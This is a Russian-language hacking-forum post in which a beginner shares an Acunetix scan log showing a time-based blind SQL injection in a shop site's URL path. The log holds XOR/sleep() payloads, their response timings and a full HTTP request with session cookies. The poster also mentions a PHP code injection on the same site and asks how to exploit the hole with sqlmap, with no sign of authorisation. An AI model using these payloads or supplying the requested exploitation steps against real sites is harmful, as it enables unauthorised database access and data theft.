Показать сообщение отдельно

  #1068  
Старый 22.09.2020, 18:16
Gutman999
Новичок
Регистрация: 22.09.2020
Сообщений: 9
Провел на форуме:
3379

Репутация: 0
По умолчанию

Доброго времени суток. Имеется на сайте Blind SQL Injection. Сканировал акунетиксом. Акунетикс использует "XOR" Вот лог. Также на сайте имеется php code injection. C этим не знаком. Не знаю как правильно скормить скулю мапу. Буду благодарен за хоть какую-то подсказку

.SpoilerTarget" type="button">Spoiler: Лог
The vulnerability affects https://www.site.com/ , ////[*]/.html

Discovered by Blind SQL Injection

Attack Details

arrow_drop_up

Path Fragment input ////[*]/.html was set to 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z

Tests performed:
  • 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 13.583
  • 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 14.42
  • 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 8.496
  • 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 4.763
  • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.538
  • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.613
  • 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 13.94
  • 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 7.891
  • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.737

Original value: Sneaker

HTTP Request


arrow_drop_up

GET /Sale/Damen/Schuhe/0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z/Sneaker-mit-abgedeckter-Schnuerung-weiss.html HTTP/1.1

X-Requested-With: XMLHttpRequest

Referer: https://www.site.com/

Cookie: language=0;sid=kk35ife9b0guk613m5pgdf9b72;sid_key= oxid

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate

Host: www.site.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Connection: Keep-alive
 
Ответить с цитированием